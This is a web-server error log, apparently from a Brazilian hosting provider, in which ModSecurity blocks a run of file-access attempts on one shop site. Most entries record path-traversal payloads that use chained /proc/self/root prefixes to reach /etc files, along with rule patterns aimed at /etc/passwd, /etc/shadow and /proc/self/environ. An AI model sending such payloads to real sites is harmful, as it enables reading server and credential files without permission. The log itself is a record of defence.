[Fri Mar 20 12:02:38.771496 2026] [:error] [pid 26799:tid 140411607643904] [client 57.141.18.28:39698] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1hjta6ubjKNq_cu4YREAAAA1A"]
[Fri Mar 20 12:02:53.185138 2026] [:error] [pid 7235:tid 140411590858496] [client 74.7.243.128:41290] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1hnfqxLDW4GITHUkQfUwAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:03:03.283195 2026] [mime_magic:error] [pid 11642:tid 140411632822016] (70014)End of file found: [client 216.73.216.191:36603] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:03:16.815149 2026] [:error] [pid 21219:tid 140411674785536] [client 57.141.18.38:42236] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1htPXLqtnMIWvjpaLRkgAAAog"]
[Fri Mar 20 12:03:31.186930 2026] [:error] [pid 31215:tid 140411548894976] [client 57.141.18.42:42978] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1hwwF0L0L-SsrnPo6dpwAAAtc"]
[Fri Mar 20 12:03:31.529949 2026] [:error] [pid 11167:tid 140411557287680] [client 57.141.18.28:42986] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1hw_HIg5MgXLBnicMp0wAAAdY"]
[Fri Mar 20 12:03:40.081895 2026] [:error] [pid 10189:tid 140411683178240] [client 74.7.243.128:50772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1hzDJ3M9BSuKP7CAZd2wAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:03:44.599329 2026] [:error] [pid 10189:tid 140411607643904] [client 57.141.18.12:43300] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1hzzJ3M9BSuKP7CAZd5wAAAJA"]
[Fri Mar 20 12:04:35.828171 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:48078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iA9a6ubjKNq_cu4YRvwAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:04:37.121370 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.241.31:34984] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iBTJ3M9BSuKP7CAZeDwAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:04:37.616986 2026] [:error] [pid 31215:tid 140411582465792] [client 74.7.241.31:56494] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iBQF0L0L-SsrnPo6duAAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:04:42.169597 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.241.31:56498] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iCjJ3M9BSuKP7CAZeGwAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:04:44.480544 2026] [:error] [pid 9818:tid 140411658000128] [client 74.7.241.31:56506] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iC11pVZ5mVmJwsFNi7wAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:04:45.781035 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:56516] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iDda6ubjKNq_cu4YRwQAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:04:47.088138 2026] [:error] [pid 11642:tid 140411540502272] [client 74.7.241.31:56524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iD7ninkcc-iUj5AqRSgAAA5g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:04:47.450408 2026] [:error] [pid 15826:tid 140411691570944] [client 57.141.18.97:45190] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1iD-oXxyEfFpUF8f-0lwAAAUY"]
[Fri Mar 20 12:04:51.957881 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:57598] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iE-oXxyEfFpUF8f-0mwAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:04:53.268176 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:57610] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iFda6ubjKNq_cu4YR0gAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:04:54.624737 2026] [:error] [pid 11167:tid 140411741927168] [client 74.7.241.31:57612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iFvHIg5MgXLBnicMp-AAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:04:55.971669 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.241.31:57628] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iFxCii7xarUs8iHagLwAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:04:57.313779 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.241.31:43192] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iGfXLqtnMIWvjpaLRyQAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:04:59.801710 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.241.31:43206] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iGgF0L0L-SsrnPo6dwQAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:03.395473 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.241.31:43222] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iHxCii7xarUs8iHagNwAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:03.911845 2026] [:error] [pid 7893:tid 140411607643904] [client 74.7.241.31:43222] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iHxCii7xarUs8iHagOAAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:06.930978 2026] [:error] [pid 31215:tid 140411658000128] [client 74.7.241.31:43224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iIgF0L0L-SsrnPo6dwwAAAso"], referer: 